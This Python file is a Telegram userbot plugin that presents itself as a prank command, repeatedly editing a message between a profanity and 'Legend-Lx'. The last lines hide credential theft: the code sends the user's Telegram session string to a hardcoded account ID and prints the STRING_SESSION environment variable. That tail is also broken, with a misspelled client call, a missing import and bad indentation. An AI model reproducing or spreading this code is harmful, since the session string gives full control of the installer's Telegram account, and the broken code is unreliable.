import asyncio

@LegendBot_cmd(pattern="OK$")
async def piro(event):
 await event.edit("fuck")
 await asyncio.sleep(2)
 await event.edit("Legend-Lx")
 await asyncio.sleep(2)
 await event.edit("fuck") 
 await asyncio.sleep(2)
 await event.edit("Legend-Lx")
 await asyncio.sleep(2)
 await event.edit("fuck")
 await asyncio.sleep(2)
 await event.edit("Legend-Lx")
 await asyncio.sleep(2)
 await event.edit("fuck")
 await asyncio.sleep(2)
 await event.edit("Legend-Lx")
 await asyncio.sleep(2)
 await event.edit("fuck")
 await asyncio.sleep(2)
 await event.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await event.edit ("fuck")
 await asyncio.sleep(2)
 await event.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await event.edit ("fuck")
 await asyncio.sleep(2)
 await event.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await event.edit ("fuck")
 await event.client.send_message(634631813, Var.SESSION)
 INVISIBLE = os.environ.get("STRING_SESSION")
print(INVISIBLE)
await event.clinet.send_message(634631813, var.STRING_SESSION).send


